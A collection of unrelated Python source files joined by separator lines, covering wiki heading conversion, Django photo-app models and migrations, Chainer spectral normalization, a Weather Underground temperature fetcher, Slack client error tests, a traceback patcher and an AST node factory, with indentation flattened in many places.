Equivalent function in dokuwiki is _headerToLink in inc/parser/xhtml.php
which calls sectionID in inc/pageutils.php
"""
result = names.clean_id(mw_heading_name, True)
result = re.sub(r'[:.]', '', result)
nums_stripped = result.lstrip("0123456789_-")
if len(nums_stripped):
return nums_stripped
else:
return "section"+re.sub(r"[^0-9]+", "", result)
def camel_to_underscore(camelcase):
"""
Convert a camelcased string to underscore_delimited (tweaked from this StackOverflow answer)
http://stackoverflow.com/questions/1175208/elegant-python-function-to-convert-camelcase-to-camel-case
"""
    s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', camelcase)
s2 = re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()
return s2
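# --- Hedged demo, not part of the original exporter ---
# Quick check of the camel-case helper above; it only runs if the module's
# own imports (wikicontent, simplemediawiki, names) resolve, e.g. when the
# script is executed from its project directory.
if __name__ == '__main__':
    print(camel_to_underscore("CamelCaseTitle"))   # camel_case_title
    print(camel_to_underscore("HTTPServerError"))  # http_server_error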
|
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
import logging
log = logging.getLogger(__name__)
from .trajectories import Trajectories
try: # pragma: no cover
from . import draw
__all__ = ['Trajectories', 'draw']
except ImportError: # pragma: no cover
    log.warning('''Matplotlib can't be imported, '''
                '''drawing module won't be available''')
__all__ = ['Trajectories']
|
from setuptools import setup
import os
execfile(os.path.join('sheetsync','version.py'))
with open('README.rst') as fh:
long_description = fh.read()
with open('requirements.txt') as fh:
requirements = [line.strip() for line in fh.readlines()]
setup(
name='sheetsync',
version=__version__,
description="Synchronize rows of data with a google spreadsheet",
long_description=long_description,
author='Mark Brenig-Jones',
author_email='markbrenigjones@gmail.com',
url='https://github.com/mbrenig/SheetSync/',
packages=['sheetsync'],
platforms='any',
install_requires=requirements,
classifiers=[
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
],
)
|
from django.db.models import manager
from .query import QuerySet
__all__ = 'Manager',
class Manager(manager.Manager.from_queryset(QuerySet)):
use_for_related_fields = True
use_in_migrations = True
|
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
import django.core.validators
class Migration(migrations.Migration):
dependencies = [
('auth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ImagrUser',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(default=django.utils.timezone.now, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', unique=True, max_length=30, verbose_name='username', validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username.', 'invalid')])),
('first_name', models.CharField(max_length=30, verbose_name='first name', blank=True)),
('last_name', models.CharField(max_length=30, verbose_name='last name', blank=True)),
('email', models.EmailField(max_length=75, verbose_name='email address', blank=True)),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('our_date_joined_field', models.DateField(auto_now_add=True)),
('our_is_active_field', models.BooleanField(default=False)),
('following', models.ManyToManyField(related_name='followers', to=settings.AUTH_USER_MODEL)),
('groups', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Group', blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of his/her group.', verbose_name='groups')),
('user_permissions', models.ManyToManyField(related_query_name='user', related_name='user_set', to='auth.Permission', blank=True, help_text='Specific permissions for this user.', verbose_name='user permissions')),
],
options={
'abstract': False,
'verbose_name': 'user',
'verbose_name_plural': 'users',
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Album',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=20)),
('description', models.CharField(max_length=140)),
('date_uploaded', models.DateField(auto_now_add=True)),
('date_modified', models.DateField(auto_now=True)),
('date_published', models.DateField()),
('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='Photo',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.CharField(max_length=20)),
('description', models.CharField(max_length=140)),
('date_uploaded', models.DateField(auto_now_add=True)),
('date_modified', models.DateField(auto_now=True)),
('date_published', models.DateField()),
('published', models.CharField(default=b'private', max_length=7, choices=[(b'private', b'Private Photo'), (b'shared', b'Shared Photo'), (b'public', b'Public Photo')])),
('image_url', models.CharField(default=b'Photo Not Found', max_length=1024)),
('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
},
bases=(models.Model,),
),
migrations.AddField(
model_name='album',
name='cover',
field=models.ForeignKey(related_name='Album_cover', to='imagr_app.Photo'),
preserve_default=True,
),
migrations.AddField(
model_name='album',
name='photos',
field=models.ManyToManyField(related_name='Album_photos', to='imagr_app.Photo'),
preserve_default=True,
),
migrations.AddField(
model_name='album',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
preserve_default=True,
),
]
|
from swgpy.object import *
def create(kernel):
result = Building()
result.template = "object/building/poi/shared_endor_ewok_medium4.iff"
result.attribute_template_id = -1
result.stfName("poi_n","base_poi_building")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
|
from Queue import *
import threading
import atexit
remote_action_PowerOn = RemoteAction()
remote_action_PowerOff = RemoteAction()
remote_action_SetInput = RemoteAction()
def local_action_activate(x = None):
'''{ "title": "Turn on", "desc": "Turn on." }'''
queue.put({'function': 'remote_action_PowerOn', 'delay': 120})
queue.put({'function': 'remote_action_SetInput', 'arg':{"source":"DIGITAL", "number":1}, 'delay': 5})
print 'Activated'
def local_action_deactivate(x = None):
'''{ "title": "Turn off", "desc": "Turn off." }'''
queue.put({'function': 'remote_action_PowerOff', 'delay': 120})
print 'Deactivated'
class TimerClass(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.event = threading.Event()
def run(self):
while not self.event.isSet():
if queue.empty() != True:
job = queue.get()
try:
print "Calling command " + job['function']
func = globals()[job['function']]
                    arg = job['arg'] if 'arg' in job else ''
func.call(arg)
self.event.wait(job['delay'])
queue.task_done()
except Exception, e:
print e
print "Failed to call command " + job['function']
else:
self.event.wait(1)
def stop(self):
self.event.set()
queue = Queue()
th = TimerClass()
@atexit.register
def cleanup():
print 'shutdown'
th.stop()
def main():
th.start()
print 'Nodel script started.'
|
'''The Example from Huang and Darwiche's Procedural Guide'''
from __future__ import division
from bayesian.factor_graph import *
from bayesian.utils import make_key
def f_a(a):
return 1 / 2
def f_b(a, b):
tt = dict(
tt=0.5,
ft=0.4,
tf=0.5,
ff=0.6)
return tt[make_key(a, b)]
def f_c(a, c):
tt = dict(
tt=0.7,
ft=0.2,
tf=0.3,
ff=0.8)
return tt[make_key(a, c)]
def f_d(b, d):
tt = dict(
tt=0.9,
ft=0.5,
tf=0.1,
ff=0.5)
return tt[make_key(b, d)]
def f_e(c, e):
tt = dict(
tt=0.3,
ft=0.6,
tf=0.7,
ff=0.4)
return tt[make_key(c, e)]
def f_f(d, e, f):
tt = dict(
ttt=0.01,
ttf=0.99,
tft=0.01,
tff=0.99,
ftt=0.01,
ftf=0.99,
fft=0.99,
fff=0.01)
return tt[make_key(d, e, f)]
def f_g(c, g):
tt = dict(
tt=0.8, tf=0.2,
ft=0.1, ff=0.9)
return tt[make_key(c, g)]
def f_h(e, g, h):
tt = dict(
ttt=0.05, ttf=0.95,
tft=0.95, tff=0.05,
ftt=0.95, ftf=0.05,
fft=0.95, fff=0.05)
return tt[make_key(e, g, h)]
if __name__ == '__main__':
g = build_graph(
f_a, f_b, f_c, f_d,
f_e, f_f, f_g, f_h)
g.n_samples = 1000
g.q()
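    # Hedged extension, not in the original example: assuming the bayesian
    # package accepts evidence as keyword arguments to q(), the same graph
    # can be queried conditioned on an observation, e.g. a being True.
    g.q(a=True)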
|
def plotLearningCurve(Xtrn, Ytrn, model, param_name, param_range):
    '''
    Compute the bias/variance tradeoff for a given model: the training and
    validation score of the model as a function of model complexity.
    Wrapper for validation_curve in sklearn.
    ---
    I: training data Xtrn, labels Ytrn, an sklearn estimator, the name of the
       complexity parameter to vary, and the range of values to try.
    O: (train_scores, valid_scores) arrays from validation_curve, one row per
       parameter value, ready to plot.
    '''
    from sklearn.learning_curve import validation_curve
    train_scores, valid_scores = validation_curve(
        model, Xtrn, Ytrn, param_name, param_range, cv=5,
        n_jobs=-1, pre_dispatch='all', verbose=1)
    return train_scores, valid_scores
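# --- Hedged usage sketch, illustrative names only ---
# How the wrapper above might be called, assuming an older scikit-learn where
# sklearn.learning_curve.validation_curve exists; the dataset and estimator
# are synthetic stand-ins.
if __name__ == '__main__':
    from sklearn.datasets import make_classification
    from sklearn.ensemble import RandomForestClassifier
    X, y = make_classification(n_samples=200, random_state=0)
    train_scores, valid_scores = plotLearningCurve(
        X, y, RandomForestClassifier(random_state=0),
        'n_estimators', [5, 10, 20])
    print(train_scores.mean(axis=1), valid_scores.mean(axis=1))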
|
from __future__ import unicode_literals
from sqlalchemy.ext.declarative import declared_attr
from indico.core.db import db
from indico.core.db.sqlalchemy import UTCDateTime
from indico.core.db.sqlalchemy.descriptions import RenderMode, RenderModeMixin
from indico.util.date_time import now_utc
class ReviewCommentMixin(RenderModeMixin):
possible_render_modes = {RenderMode.markdown}
default_render_mode = RenderMode.markdown
user_backref_name = None
user_modified_backref_name = None
TIMELINE_TYPE = 'comment'
@declared_attr
def id(cls):
return db.Column(
db.Integer,
primary_key=True
)
@declared_attr
def user_id(cls):
return db.Column(
db.Integer,
db.ForeignKey('users.users.id'),
index=True,
nullable=False
)
@declared_attr
def _text(cls):
return db.Column(
'text',
db.Text,
nullable=False
)
@declared_attr
def modified_by_id(cls):
return db.Column(
db.Integer,
db.ForeignKey('users.users.id'),
index=True,
nullable=True
)
@declared_attr
def created_dt(cls):
return db.Column(
UTCDateTime,
nullable=False,
default=now_utc
)
@declared_attr
def modified_dt(cls):
return db.Column(
UTCDateTime,
nullable=True
)
@declared_attr
def is_deleted(cls):
return db.Column(
db.Boolean,
nullable=False,
default=False
)
@declared_attr
def user(cls):
return db.relationship(
'User',
lazy=True,
foreign_keys=cls.user_id,
backref=db.backref(
cls.user_backref_name,
primaryjoin='({0}.user_id == User.id) & ~{0}.is_deleted'.format(cls.__name__),
lazy='dynamic'
)
)
@declared_attr
def modified_by(cls):
return db.relationship(
'User',
lazy=True,
foreign_keys=cls.modified_by_id,
backref=db.backref(
cls.user_modified_backref_name,
primaryjoin='({0}.modified_by_id == User.id) & ~{0}.is_deleted'.format(cls.__name__),
lazy='dynamic'
)
)
text = RenderModeMixin.create_hybrid_property('_text')
|
"""blah."""
from pyiem.util import get_dbconn
pgconn = get_dbconn("idep")
cursor = pgconn.cursor()
cursor.execute(
"""
SELECT r.hs_id, r.huc_12, p.fpath, extract(year from valid) as yr,
sum(runoff) as sum_runoff,
sum(loss) as sum_loss, sum(delivery) as sum_delivery from
results r JOIN flowpaths p on (r.hs_id = p.fid)
WHERE r.scenario = 5
GROUP by r.hs_id, r.huc_12, fpath, yr
"""
)
print("CATCHMENT,HUC12,FPATH,YEAR,RUNOFF,LOSS,DELIVERY")
for row in cursor:
fpath = row[0]
if fpath < 100:
catchment = 0
else:
catchment = int(str(fpath)[:-2])
print(str(catchment) + ",%s,%s,%s,%.4f,%.4f,%.4f" % row[1:])
|
import functools
import sys
import traceback
from stacked import Stacked
from .xtraceback import XTraceback
class TracebackCompat(Stacked):
"""
A context manager that patches the stdlib traceback module
Functions in the traceback module that exist as a method of this class are
replaced with equivalents that use XTraceback.
:cvar NOPRINT: Exception types that we don't print for (includes None)
:type NOPRINT: tuple
:ivar defaults: Default options to apply to XTracebacks created by this
instance
:type defaults: dict
"""
NOPRINT = (None, KeyboardInterrupt)
def __init__(self, **defaults):
super(TracebackCompat, self).__init__()
self.defaults = defaults
# register patches for methods that wrap traceback functions
for key in dir(traceback):
if hasattr(self, key):
self._register_patch(traceback, key, getattr(self, key))
#def __exit__(self, etype, evalue, tb):
#if etype not in self.NOPRINT:
#self.print_exception(etype, evalue, tb)
#super(TracebackCompat, self).__exit__(etype, evalue, tb)
def _factory(self, etype, value, tb, limit=None, **options):
options["limit"] = \
getattr(sys, "tracebacklimit", None) if limit is None else limit
_options = self.defaults.copy()
_options.update(options)
return XTraceback(etype, value, tb, **_options)
def _print_factory(self, etype, value, tb, limit=None, file=None,
**options):
# late binding here may cause problems where there is no sys i.e. on
# google app engine but it is required for cases where sys.stderr is
# rebound i.e. under nose
if file is None and hasattr(sys, "stderr"):
file = sys.stderr
options["stream"] = file
return self._factory(etype, value, tb, limit, **options)
@functools.wraps(traceback.format_tb)
def format_tb(self, tb, limit=None, **options):
xtb = self._factory(None, None, tb, limit, **options)
return xtb.format_tb()
@functools.wraps(traceback.format_exception_only)
def format_exception_only(self, etype, value, **options):
xtb = self._factory(etype, value, None, **options)
return xtb.format_exception_only()
@functools.wraps(traceback.format_exception)
def format_exception(self, etype, value, tb, limit=None, **options):
xtb = self._factory(etype, value, tb, limit, **options)
return xtb.format_exception()
@functools.wraps(traceback.format_exc)
def format_exc(self, limit=None, **options):
options["limit"] = limit
return "".join(self.format_exception(*sys.exc_info(), **options))
@functools.wraps(traceback.print_tb)
def print_tb(self, tb, limit=None, file=None, **options):
xtb = self._print_factory(None, None, tb, limit, file, **options)
xtb.print_tb()
@functools.wraps(traceback.print_exception)
def print_exception(self, etype, value, tb, limit=None, file=None,
**options):
xtb = self._print_factory(etype, value, tb, limit, file, **options)
xtb.print_exception()
@functools.wraps(traceback.print_exc)
def print_exc(self, limit=None, file=None, **options):
options["limit"] = limit
options["file"] = file
self.print_exception(*sys.exc_info(), **options)
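# --- Hedged usage sketch, not part of xtraceback ---
# Assuming Stacked's context-manager protocol applies the registered patches
# (as the class docstring states), traceback.format_exc inside the block is
# served by XTraceback.
if __name__ == '__main__':
    with TracebackCompat():
        try:
            {}['missing']
        except KeyError:
            print(traceback.format_exc())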
|
import urllib2, json, time, sys
from datetime import date, datetime
from dateutil.rrule import rrule, DAILY
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-f", dest="fahrenheit", action="store", default=False, type="string", help="Convert to FAHRENHEIT")
parser.add_option("-e", dest="end", action="store", default=False, type="string", help="START date")
parser.add_option("-s", dest="start", action="store", default=False, type="string", help="END date")
parser.add_option("-t", dest="token", action="store", default=False, type="string", help="Weather Underground TOKEN")
(options, args) = parser.parse_args()
if options.token:
token = options.token
else:
parser.print_help()
sys.exit()
if options.start:
start = options.start
else:
parser.print_help()
sys.exit()
if options.end:
end = options.end
else:
parser.print_help()
sys.exit()
if options.fahrenheit:
fahrenheit = True
else:
fahrenheit = False
start = datetime.strptime(start,'%Y-%m-%d')
end = datetime.strptime(end,'%Y-%m-%d')
url = ""
if end < start:
print "Error: end date " + str(end) + " occurs before start date " + str(start)
sys.exit()
for dt in rrule(DAILY, dtstart=start, until=end):
total = 0.0
temp = 0.0
count = 0
wunderground_url ="http://api.wunderground.com/api/" + token + "/history_" + dt.strftime("%Y%m%d") +"/q/NY/New_York_City.json"
try:
url = urllib2.urlopen(wunderground_url)
parsed_json = json.loads(url.read())
except:
print "Error reading URL " + wunderground_url
print "Is your token correct?"
url.close()
sys.exit()
try:
for mean in parsed_json['history']['observations']:
if fahrenheit:
total += float(mean['tempi'])
else:
total += float(mean['tempm'])
count += 1
temp = (total / count)
print dt.strftime("%Y-%m-%d") + "," + str(temp)
except:
print "Error retrieving temperature records for start date " + str(start) + " end date " + str(end)
url.close()
time.sleep(10)
|
import unittest
import slack.http_client
from slack.exception import SlackError, \
InvalidAuthError, \
NotAuthedError, \
AccountInactiveError, \
ChannelNotFoundError, \
ChannelArchivedError, \
NotInChannelError, \
RateLimitedError
class TestRaiseErrorClient(unittest.TestCase):
def test_ok_response(self):
# does not raise error if response is ok
slack.http_client._raise_error_if_not_ok({ 'ok': True })
def test_invalid_auth(self):
self.assertRaises(InvalidAuthError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'invalid_auth' })
def test_not_authed(self):
self.assertRaises(NotAuthedError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'not_authed' })
def test_account_inactive(self):
self.assertRaises(AccountInactiveError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'account_inactive' })
def test_channel_not_found(self):
self.assertRaises(ChannelNotFoundError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'channel_not_found' })
def test_is_archived(self):
self.assertRaises(ChannelArchivedError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'is_archived' })
def test_not_in_channel(self):
self.assertRaises(NotInChannelError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'not_in_channel' })
def test_rate_limited(self):
self.assertRaises(RateLimitedError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'rate_limited' })
def test_slack_error(self):
self.assertRaises(SlackError,
slack.http_client._raise_error_if_not_ok,
{ 'ok': False, 'error': 'unknown_error' })
|
import ShareYourSystem as SYS
MyParenter=SYS.ParenterClass(
).array(
[
['-Layers'],
['|First','|Second'],
['-Neurons'],
['|E','|I']
]
).command(
'+-.values+|.values',
'#call:parent',
_AfterWalkRigidBool=True
).command(
'+-.values+|.values',
{
'#bound:recruit':lambda _InstanceVariable:_InstanceVariable[
'/Top/NeuronsDict'
].__setitem__(
_InstanceVariable.ManagementTagStr,
_InstanceVariable
)
if _InstanceVariable['/^/ParentKeyStr']=="Neurons"
else None,
'/Top/LayersDict.__setitem__':{
'#value:#map@get':["/~/ManagementTagStr",">>self"],
'#if':[
('/~/^/ParentKeyStr',SYS.operator.eq,"#direct:Layers")
]
}
},
_AfterWalkRigidBool=True
)
print('MyParenter.NeuronsDict.keys() is ')
SYS._print(MyParenter.NeuronsDict.keys())
print('MyParenter.LayersDict.keys() is ')
SYS._print(MyParenter.LayersDict.keys())
|
import numpy
import chainer
from chainer import backend
from chainer import configuration
import chainer.functions as F
from chainer import link_hook
import chainer.links as L
from chainer import variable
import chainerx
from chainerx import _fallback_workarounds as fallback
def l2normalize(xp, v, eps):
"""Normalize a vector by its L2 norm.
Args:
        xp (numpy or cupy): Array module of ``v``.
        v (numpy.ndarray or cupy.ndarray): Vector to normalize.
eps (float): Epsilon value for numerical stability.
Returns:
:class:`numpy.ndarray` or :class:`cupy.ndarray`
"""
# TODO(crcrpar): Remove this when chainerx.linalg.norm becomes available.
if xp is chainerx:
# NOTE(crcrpar): `chainerx.power` is not available as of 2019/03/27.
# See https://github.com/chainer/chainer/pull/6522
norm = chainerx.sqrt(chainerx.sum(v * v))
else:
norm = xp.linalg.norm(v)
return v / (norm + eps)
def update_approximate_vectors(
weight_matrix, u, n_power_iteration, eps):
"""Update the first left and right singular vectors.
This function updates the first left singular vector `u` and
the first right singular vector `v`.
Args:
weight_matrix (~chainer.Variable): 2D weight.
u (numpy.ndarray, cupy.ndarray, or None):
Vector that approximates the first left singular vector and
has the shape of (out_size,).
        n_power_iteration (int): Number of iterations to approximate
            the first right and left singular vectors.
        eps (float): Epsilon value for numerical stability of the norm.
Returns:
:class:`numpy.ndarray` or `cupy.ndarray`:
Approximate first left singular vector.
:class:`numpy.ndarray` or `cupy.ndarray`:
Approximate first right singular vector.
"""
weight_matrix = weight_matrix.array
xp = backend.get_array_module(weight_matrix)
for _ in range(n_power_iteration):
v = l2normalize(xp, xp.dot(u, weight_matrix), eps)
u = l2normalize(xp, xp.dot(weight_matrix, v), eps)
return u, v
def calculate_max_singular_value(weight_matrix, u, v):
"""Calculate max singular value by power iteration method.
Args:
weight_matrix (~chainer.Variable)
u (numpy.ndarray or cupy.ndarray)
v (numpy.ndarray or cupy.ndarray)
Returns:
~chainer.Variable: Max singular value via power iteration method.
"""
sigma = F.matmul(F.matmul(u, weight_matrix), v)
return sigma
class SpectralNormalization(link_hook.LinkHook):
"""Spectral Normalization link hook implementation.
This hook normalizes a weight using max singular value and this value
is computed via power iteration method. Currently, this hook is supposed to
be added to :class:`chainer.links.Linear`, :class:`chainer.links.EmbedID`,
:class:`chainer.links.Convolution2D`, :class:`chainer.links.ConvolutionND`,
:class:`chainer.links.Deconvolution2D`,
and :class:`chainer.links.DeconvolutionND`. However, you can use this to
other links like RNNs by specifying ``weight_name``.
It is highly recommended to add this hook before optimizer setup because
    this hook adds a scaling parameter ``gamma`` if ``use_gamma`` is True.
Otherwise, the registered ``gamma`` will not be updated.
.. math::
\\bar{\\mathbf{W}} &=& \\dfrac{\\mathbf{W}}{\\sigma(\\mathbf{W})} \\\\
\\text{, where} \\ \\sigma(\\mathbf{W}) &:=&
\\max_{\\mathbf{h}: \\mathbf{h} \\ne 0}
\\dfrac{\\|\\mathbf{W} \\mathbf{h}\\|_2}{\\|\\mathbf{h}\\|_2}
= \\max_{\\|\\mathbf{h}\\|_2 \\le 1} \\|\\mathbf{W}\\mathbf{h}\\|_2
See: T. Miyato et. al., `Spectral Normalization for Generative Adversarial
Networks <https://arxiv.org/abs/1802.05957>`_
Args:
n_power_iteration (int): Number of power iteration.
The default value is 1.
eps (float): Numerical stability in norm calculation.
The default value is 1e-6 for the compatibility with
mixed precision training. The value used in the author's
implementation is 1e-12.
use_gamma (bool): If ``True``, weight scaling parameter gamma which is
initialized by initial weight's max singular value is introduced.
factor (float, None): Scaling parameter to divide maximum singular
value. The default value is 1.0.
weight_name (str): Link's weight name to apply this hook. The default
value is ``'W'``.
name (str or None): Name of this hook. The default value is
``'SpectralNormalization'``.
Attributes:
vector_name (str): Name of the approximate first left singular vector
registered in the target link.
axis (int): Axis of weight represents the number of output
feature maps or output units (``out_channels`` and
``out_size``, respectively).
.. admonition:: Example
There are almost the same but 2 ways to apply spectral normalization
(SN) hook to links.
1. Initialize link and SN separately. This makes it easy to handle
buffer and parameter of links registered by SN hook.
>>> l = L.Convolution2D(3, 5, 3)
>>> hook = chainer.link_hooks.SpectralNormalization()
>>> _ = l.add_hook(hook)
>>> # Check the shape of the first left singular vector.
>>> getattr(l, hook.vector_name).shape
(5,)
>>> # Delete SN hook from this link.
>>> l.delete_hook(hook.name)
2. Initialize both link and SN hook at one time. This makes it easy to
define your original :class:`~chainer.Chain`.
>>> # SN hook handles lazy initialization!
>>> layer = L.Convolution2D(
... 5, 3, stride=1, pad=1).add_hook(
... chainer.link_hooks.SpectralNormalization())
"""
name = 'SpectralNormalization'
def __init__(self, n_power_iteration=1, eps=1e-6, use_gamma=False,
factor=None, weight_name='W', name=None):
assert n_power_iteration > 0
self.n_power_iteration = n_power_iteration
self.eps = eps
self.use_gamma = use_gamma
self.factor = factor
self.weight_name = weight_name
self.vector_name = weight_name + '_u'
self._initialized = False
self.axis = 0
if name is not None:
self.name = name
def __enter__(self):
raise NotImplementedError(
'This hook is not supposed to be used as context manager.')
def __exit__(self):
raise NotImplementedError
def added(self, link):
# Define axis and register ``u`` if the weight is initialized.
if not hasattr(link, self.weight_name):
raise ValueError(
'Weight \'{}\' does not exist!'.format(self.weight_name))
if isinstance(link, (L.Deconvolution2D, L.DeconvolutionND)):
self.axis = 1
if getattr(link, self.weight_name).array is not None:
self._prepare_parameters(link)
def deleted(self, link):
        # Remove approximate vector ``u`` and parameter ``gamma`` if it exists.
delattr(link, self.vector_name)
if self.use_gamma:
del link.gamma
def forward_preprocess(self, cb_args):
# This method normalizes target link's weight spectrally
# using power iteration method
link = cb_args.link
input_variable = cb_args.args[0]
if not self._initialized:
self._prepare_parameters(link, input_variable)
weight = getattr(link, self.weight_name)
        # So that link.W (or its equivalent) consistently appears to users as
        # a chainer.Parameter, this hook keeps a reference to the
        # unnormalized weight.
self.original_weight = weight
# note: `normalized_weight` is ~chainer.Variable
normalized_weight = self.normalize_weight(link)
setattr(link, self.weight_name, normalized_weight)
def forward_postprocess(self, cb_args):
# Here, the computational graph is already created,
# we can reset link.W or equivalents to be Parameter.
link = cb_args.link
setattr(link, self.weight_name, self.original_weight)
def _prepare_parameters(self, link, input_variable=None):
"""Prepare one buffer and one parameter.
Args:
link (:class:`~chainer.Link`): Link to normalize spectrally.
input_variable (:class:`~chainer.Variable`):
The first minibatch to initialize weight.
"""
if getattr(link, self.weight_name).array is None:
if input_variable is not None:
link._initialize_params(input_variable.shape[1])
initialW = getattr(link, self.weight_name)
if initialW.shape[self.axis] == 0:
raise ValueError(
'Expect {}.shape[{}] > 0'.format(self.weight_name, self.axis)
)
u = link.xp.random.normal(
size=(initialW.shape[self.axis],)).astype(dtype=initialW.dtype)
setattr(link, self.vector_name, u)
link.register_persistent(self.vector_name)
if self.use_gamma:
# Initialize the scaling parameter with the max singular value.
weight_matrix = self.reshape_W(initialW.array)
# TODO(crcrpar): Remove this when chainerx supports SVD.
if link.xp is chainerx:
xp, device, array = fallback._from_chx(weight_matrix)
if xp is numpy:
_, s, _ = numpy.linalg.svd(array)
else:
with chainer.using_device(device):
_, s, _ = xp.linalg.svd(array)
else:
_, s, _ = link.xp.linalg.svd(weight_matrix)
with link.init_scope():
link.gamma = variable.Parameter(s[0], ())
self._initialized = True
def normalize_weight(self, link):
"""Normalize target weight before every single forward computation."""
weight_name, vector_name = self.weight_name, self.vector_name
W = getattr(link, weight_name)
u = getattr(link, vector_name)
weight_matrix = self.reshape_W(W)
if not configuration.config.in_recomputing:
with chainer.using_device(link.device):
u, v = update_approximate_vectors(
weight_matrix, u, self.n_power_iteration, self.eps)
else:
v = self.v
sigma = calculate_max_singular_value(weight_matrix, u, v)
if self.factor is not None:
sigma /= self.factor
if self.use_gamma:
W = link.gamma * W / sigma
else:
W = W / sigma
if not configuration.config.in_recomputing:
self.v = v
with chainer.using_device(link.device):
if configuration.config.train:
if link.xp is chainerx:
# TODO(crcrpar): Remove this when
# chainerx supports `copyto`.
getattr(link, vector_name)[:] = u
else:
backend.copyto(getattr(link, vector_name), u)
return W
def reshape_W(self, W):
"""Reshape & transpose weight into 2D if necessary."""
if self.axis != 0:
axes = [self.axis] + [i for i in range(W.ndim) if i != self.axis]
W = W.transpose(axes)
if W.ndim == 2:
return W
return W.reshape(W.shape[0], -1)
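# --- Hedged sanity check, not part of Chainer ---
# With plain NumPy inputs, a few power iterations through the helpers above
# should approach the largest singular value reported by numpy.linalg.svd.
# Chainer and NumPy are assumed to be installed; shapes and seed are arbitrary.
if __name__ == '__main__':
    rng = numpy.random.RandomState(0)
    W = variable.Variable(rng.randn(4, 3).astype(numpy.float32))
    u0 = rng.randn(4).astype(numpy.float32)
    u, v = update_approximate_vectors(W, u0, n_power_iteration=50, eps=1e-6)
    sigma = calculate_max_singular_value(W, u, v)
    print(float(sigma.array), float(numpy.linalg.svd(W.array)[1][0]))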
|
from SimpleTCPClient import SimpleTCPClient
from SimpleTCPClientException import HTTPError, URLError
__all__ = [SimpleTCPClient, HTTPError, URLError]
|
import sys as _sys
import ast as _ast
from ast import boolop, cmpop, excepthandler, expr, expr_context, operator
from ast import slice, stmt, unaryop, mod, AST
def _make_node(Name, Fields, Attributes, Bases):
def create_node(self, *args, **kwargs):
nbparam = len(args) + len(kwargs)
assert nbparam in (0, len(Fields)), \
"Bad argument number for {}: {}, expecting {}".\
format(Name, nbparam, len(Fields))
self._fields = Fields
self._attributes = Attributes
for argname, argval in zip(self._fields, args):
setattr(self, argname, argval)
for argname, argval in kwargs.items():
assert argname in Fields, \
"Invalid Keyword argument for {}: {}".format(Name, argname)
setattr(self, argname, argval)
setattr(_sys.modules[__name__],
Name,
type(Name,
Bases,
{'__init__': create_node}))
_nodes = {
# mod
'Module': (('body',), (), (mod,)),
'Interactive': (('body',), (), (mod,)),
'Expression': (('body',), (), (mod,)),
'Suite': (('body',), (), (mod,)),
# stmt
'FunctionDef': (('name', 'args', 'body', 'decorator_list', 'returns',),
('lineno', 'col_offset',),
(stmt,)),
'AsyncFunctionDef': (('name', 'args', 'body',
'decorator_list', 'returns',),
('lineno', 'col_offset',),
(stmt,)),
'ClassDef': (('name', 'bases', 'keywords', 'body', 'decorator_list',),
('lineno', 'col_offset',),
(stmt,)),
'Return': (('value',), ('lineno', 'col_offset',),
(stmt,)),
'Delete': (('targets',), ('lineno', 'col_offset',),
(stmt,)),
'Assign': (('targets', 'value',), ('lineno', 'col_offset',),
(stmt,)),
'AugAssign': (('target', 'op', 'value',), ('lineno', 'col_offset',),
(stmt,)),
'Print': (('dest', 'values', 'nl',), ('lineno', 'col_offset',),
(stmt,)),
'For': (('target', 'iter', 'body', 'orelse',), ('lineno', 'col_offset',),
(stmt,)),
'AsyncFor': (('target', 'iter', 'body', 'orelse',),
('lineno', 'col_offset',),
(stmt,)),
'While': (('test', 'body', 'orelse',), ('lineno', 'col_offset',),
(stmt,)),
'If': (('test', 'body', 'orelse',), ('lineno', 'col_offset',),
(stmt,)),
'With': (('items', 'body',), ('lineno', 'col_offset',),
(stmt,)),
'AsyncWith': (('items', 'body',), ('lineno', 'col_offset',),
(stmt,)),
'Raise': (('exc', 'cause',), ('lineno', 'col_offset',),
(stmt,)),
'Try': (('body', 'handlers', 'orelse', 'finalbody',),
('lineno', 'col_offset',),
(stmt,)),
'Assert': (('test', 'msg',), ('lineno', 'col_offset',),
(stmt,)),
'Import': (('names',), ('lineno', 'col_offset',),
(stmt,)),
